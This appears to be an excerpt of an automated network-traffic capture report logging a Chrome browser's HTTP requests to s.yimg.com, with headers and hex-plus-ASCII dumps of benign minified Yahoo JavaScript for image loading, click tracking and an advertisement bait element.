                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 635583
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 69 6d 61 67 65 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 69 6d 61 67 65 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-image",[],t):"object"==typeof exports?exports["wafer-image"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 2c 74 2c 72 29 7b 72 26 26 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 73 65 74 22 2c 72 29 2c 65 2e 73 72 63 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 2c 72 29 7b 76 61 72 20 61 3d 65 2e 67 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: totype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function n(e,t,r){r&&e.setAttribute("srcset",r),e.src=t}function i(e,t,r){var a=e.ge
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 75 6d 65 6e 74 73 5b 30 5d 3a 7b 7d 2c 72 3d 65 2e 72 6f 6f 74 2c 73 3d 76 6f 69 64 20 30 3d 3d 3d 72 3f 64 6f 63 75 6d 65 6e 74 3a 72 3b 61 28 74 68 69 73 2c 74 29 3b 76 61 72 20 6e 3d 74 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 66 69 67 73 2c 69 3d 6e 2e 64 61 72 6b 53 72 63 73 65 74 2c 6c 3d 6e 2e 6e 61 74 69 76 65 43 6c 61 73 73 2c 75 3d 6e 2e 73 65 6c 65 63 74 6f 72 2c 66 3d 6e 2e 73 65 70 61 72 61 74 6f 72 2c 64 3d 6e 2e 73 72 63 73 65 74 2c 70 3d 6e 2e 73 75 63 63 65 73 73 43 6c 61 73 73 2c 79 3d 6f 28 74 68 69 73 2c 28 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 29 2e 63 61 6c 6c 28 74 68 69 73 2c 7b 72 6f 6f 74 3a 73 2c 73 65 6c 65 63 74 6f 72 3a 75 2c 73 75 63 63 65 73 73 43 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: uments[0]:{},r=e.root,s=void 0===r?document:r;a(this,t);var n=t.prototype.configs,i=n.darkSrcset,l=n.nativeClass,u=n.selector,f=n.separator,d=n.srcset,p=n.successClass,y=o(this,(t.__proto__||Object.getPrototypeOf(t)).call(this,{root:s,selector:u,successCl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 22 2c 64 29 7d 29 29 2c 74 2e 5f 61 64 64 45 76 65 6e 74 73 54 6f 45 6c 65 6d 65 6e 74 28 65 2c 70 2c 22 64 65 66 61 75 6c 74 22 2c 6f 29 7d 72 65 74 75 72 6e 20 61 28 29 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 43 6f 6c 6f 72 53 63 68 65 6d 61 43 68 61 6e 67 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 73 74 61 74 65 2e 64 61 72 6b 6d 6f 64 65 49 6e 73 74 61 6e 63 65 73 2c 74 3d 21 30 2c 72 3d 21 31 2c 61 3d 76 6f 69 64 20 30 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 6f 2c 73 3d 65 2e 6b 65 79 73 28 29 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 3b 21 28 74 3d 28 6f 3d 73 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 3b 74 3d 21 30 29 7b 76 61 72 20 6e 3d 6f 2e 76 61 6c 75 65 3b 74 68 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ",d)})),t._addEventsToElement(e,p,"default",o)}return a()})}},{key:"handleColorSchemaChange",value:function(){var e=this._state.darkmodeInstances,t=!0,r=!1,a=void 0;try{for(var o,s=e.keys()[Symbol.iterator]();!(t=(o=s.next()).done);t=!0){var n=o.value;thi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 7b 65 6c 65 6d 3a 65 2c 6d 65 74 61 3a 7b 73 72 63 3a 73 2c 73 72 63 73 65 74 3a 69 7d 2c 6e 61 6d 65 3a 22 57 61 66 65 72 49 6d 61 67 65 22 2c 73 74 61 63 6b 3a 6e 75 6c 6c 7d 29 2c 77 28 74 2c 22 65 72 72 6f 72 22 2c 72 29 2c 77 28 74 2c 22 6c 6f 61 64 22 2c 76 29 7d 2c 76 3d 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 22 6e 61 74 69 76 65 22 21 3d 3d 72 3f 28 22 69 6d 61 67 65 22 3d 3d 3d 6c 7c 7c 22 70 69 63 74 75 72 65 22 3d 3d 3d 6c 3f 6e 28 65 2c 73 2c 69 29 3a 65 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 3d 27 75 72 6c 28 22 27 2b 73 2b 27 22 29 27 2c 6f 2e 5f 69 74 65 6d 4c 6f 61 64 65 64 28 65 29 29 3a 28 6f 2e 5f 61 64 64 42 6f 75 6e 64 61 72 79 53 75 63 63 65 73 73 43 6c 61 73 73 28 65 29 2c 65 2e 63 6c 61 73 73 4c 69 73 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: {elem:e,meta:{src:s,srcset:i},name:"WaferImage",stack:null}),w(t,"error",r),w(t,"load",v)},v=function a(){"native"!==r?("image"===l||"picture"===l?n(e,s,i):e.style.backgroundImage='url("'+s+'")',o._itemLoaded(e)):(o._addBoundarySuccessClass(e),e.classList
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC145INData Raw: 43 6c 61 73 73 3a 22 77 61 66 65 72 2d 69 6d 67 2d 6e 61 74 69 76 65 22 2c 73 75 63 63 65 73 73 43 6c 61 73 73 3a 22 77 61 66 65 72 2d 69 6d 67 2d 6c 6f 61 64 65 64 22 2c 61 6c 6c 6f 77 50 72 65 66 65 74 63 68 3a 21 30 7d 3b 76 61 72 20 4f 3d 53 3b 74 2e 64 65 66 61 75 6c 74 3d 6e 65 77 20 4f 28 7b 73 65 6c 65 63 74 6f 72 3a 4f 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 66 69 67 73 2e 73 65 6c 65 63 74 6f 72 7d 29 7d 7d 29 7d 29 3b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Class:"wafer-img-native",successClass:"wafer-img-loaded",allowPrefetch:!0};var O=S;t.default=new O({selector:O.prototype.configs.selector})}})});


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    97192.168.2.44986087.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC376OUTGET /nn/lib/metro/g/myy/advertisement_0.0.19.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC610INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: b9LsutmlDcsg4cPkNEaznBV8CMW6833XY1K2HBC9ddhbz/5gspIsWkLbg32Nj6OxhUcgnb8vyNw=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: 58Q8PEA3CRQPG9A0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 03 Sep 2024 18:58:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 19 May 2020 03:33:21 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "ca243b22264dca7a4a899c51cc2dc963"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000, public, immutable
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 158
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC158INData Raw: 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 64 69 76 20 69 64 3d 22 61 64 76 65 72 74 69 73 65 6d 65 6e 74 2d 74 68 61 6d 62 61 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 44 69 73 70 6c 61 79 20 41 64 76 65 72 74 69 73 65 6d 65 6e 74 3c 2f 64 69 76 3e 27 29 3b 2f 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 32 30 2c 20 59 61 68 6f 6f 21 20 49 6e 63 2e 20 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2a 2f 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: document.write('<div id="advertisement-thamba" style="display:none">Display Advertisement</div>');/* Copyright (c) 2020, Yahoo! Inc. All rights reserved. */


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    98192.168.2.44985887.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC539OUTGET /aaq/wf/wf-rapid-1.10.9-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC678INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: QI33r99gsWzB4dJxrl/mLLUNob2Q3Rc1+mUlunK068ssdjaJUavOujz+bMisbC1Xa6a/PvBxvlI=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: QKG3D6HTVSNXMYD2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Thu, 19 Sep 2024 06:12:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 02 Jul 2024 08:11:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "da320d39602c7372e993ed8ca6026a92"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: D1eAABL3ZzqbxuHoTmJS4lz3o8UHw1Tk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 12677
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 990484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 72 61 70 69 64 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 72 61 70 69 64 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-rapid",[],t):"object"==typeof exports?exports["wafer-rapid"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: totype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function o(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 72 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 72 2c 6e 29 26 26 28 65 5b 6e 5d 3d 72 5b 6e 5d 29 7d 72 65 74 75 72 6e 20 65 7d 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 76 61 72 20 72 3d 5b 5d 2c 6e 3d 21 30 2c 69 3d 21 31 2c 61 3d 76 6f 69 64 20 30 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 6f 2c 73 3d 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 3b 21 28 6e 3d 28 6f 3d 73 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 72 2e 70 75 73 68 28 6f 2e 76 61 6c 75 65 29 2c 21 74 7c 7c 72 2e 6c 65 6e 67 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ngth;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e},g=function(){function e(e,t){var r=[],n=!0,i=!1,a=void 0;try{for(var o,s=e[Symbol.iterator]();!(n=(o=s.next()).done)&&(r.push(o.value),!t||r.lengt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 72 2d 6f 66 66 73 65 74 22 29 7c 7c 22 22 29 2e 73 70 6c 69 74 28 22 20 22 29 2c 63 3d 67 28 6c 2c 32 29 2c 75 3d 63 5b 30 5d 2c 66 3d 63 5b 31 5d 2c 64 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 49 2b 22 72 61 70 69 64 2d 74 72 69 67 67 65 72 2d 69 6e 74 65 72 76 61 6c 22 29 3b 22 63 6c 69 63 6b 22 21 3d 3d 73 26 26 22 65 61 63 68 43 6c 69 63 6b 22 21 3d 3d 73 7c 7c 65 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 61 73 2d 72 61 70 69 64 2d 63 6c 69 63 6b 22 2c 22 68 61 73 2d 77 61 66 65 72 2d 63 6c 69 63 6b 22 29 3b 76 61 72 20 70 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 49 2b 22 72 61 70 69 64 2d 6d 65 74 68 6f 64 22 29 2c 68 3d 28 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 49 2b 22 72 61 70 69 64 2d 6e 61 6d 65 22 29 7c 7c 22 22 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: r-offset")||"").split(" "),c=g(l,2),u=c[0],f=c[1],d=e.getAttribute(I+"rapid-trigger-interval");"click"!==s&&"eachClick"!==s||e.classList.add("has-rapid-click","has-wafer-click");var p=e.getAttribute(I+"rapid-method"),h=(e.getAttribute(I+"rapid-name")||"")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 63 6f 6e 45 76 65 6e 74 22 3d 3d 3d 61 29 7b 76 61 72 20 63 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 65 6c 65 6d 3b 62 2e 65 6d 69 74 4c 6f 67 28 7b 6e 61 6d 65 3a 22 57 61 66 65 72 52 61 70 69 64 22 2c 65 6c 65 6d 3a 63 2c 6d 65 74 61 3a 7b 69 31 33 6e 3a 6c 2c 6e 61 6d 65 3a 73 2c 74 79 70 65 3a 22 62 65 61 63 6f 6e 45 76 65 6e 74 22 7d 7d 29 2c 22 69 6e 74 65 6e 74 69 6f 6e 61 6c 56 69 65 77 22 3d 3d 3d 69 3f 65 2e 62 65 61 63 6f 6e 45 76 65 6e 74 28 22 69 6e 74 65 6e 74 69 6f 6e 61 6c 20 76 69 65 77 22 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 7d 2c 6c 2c 7b 6c 6c 33 3a 73 7d 29 29 3a 65 2e 62 65 61 63 6f 6e 45 76 65 6e 74 28 73 2c 6c 29 7d 65 6c 73 65 20 69 66 28 22 62 65 61 63 6f 6e 4c 69 6e 6b 56 69 65 77 73 22 3d 3d 3d 61 29 65 2e 62 65 61 63 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: conEvent"===a){var c=this._util.elem;b.emitLog({name:"WaferRapid",elem:c,meta:{i13n:l,name:s,type:"beaconEvent"}}),"intentionalView"===i?e.beaconEvent("intentional view",Object.assign({},l,{ll3:s})):e.beaconEvent(s,l)}else if("beaconLinkViews"===a)e.beaco
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 65 6d 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 68 61 73 2d 72 61 70 69 64 2d 63 6c 69 63 6b 22 29 26 26 74 68 69 73 2e 5f 62 65 61 63 6f 6e 54 72 69 67 67 65 72 28 29 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 52 61 70 69 64 4d 6f 75 73 65 45 6e 74 65 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 5f 64 65 73 74 72 6f 79 65 64 7c 7c 28 56 28 74 68 69 73 2e 5f 73 74 61 74 65 2e 6d 6f 75 73 65 45 6e 74 65 72 54 69 6d 65 6f 75 74 2c 74 68 69 73 29 2c 74 68 69 73 2e 5f 73 74 61 74 65 2e 6d 6f 75 73 65 45 6e 74 65 72 54 69 6d 65 6f 75 74 3d 6a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 5f 62 65 61 63 6f 6e 54 72 69 67 67 65 72 28 29 7d 2c 31 30 30 2c 74 68 69 73 29 29 7d 7d 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: em.classList.contains("has-rapid-click")&&this._beaconTrigger()}},{key:"handleRapidMouseEnter",value:function(){var e=this;this._destroyed||(V(this._state.mouseEnterTimeout,this),this._state.mouseEnterTimeout=j(function(){e._beaconTrigger()},100,this))}},
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 26 26 28 6e 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e 2e 6b 65 79 2c 6e 29 7d 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 72 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 72 29 2c 6e 26 26 65 28 74 2c 6e 29 2c 74 7d 7d 28 29 2c 52 3d 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 72 2c 6e 29 7b 6e 75 6c 6c 3d 3d 3d 74 26 26 28 74 3d 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 29 3b 76 61 72 20 69 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 74 2c 72 29 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 69 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: &&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(t,r,n){return r&&e(t.prototype,r),n&&e(t,n),t}}(),R=function e(t,r,n){null===t&&(t=Function.prototype);var i=Object.getOwnPropertyDescriptor(t,r);if(void 0===i){var a=Object.getPrototypeO
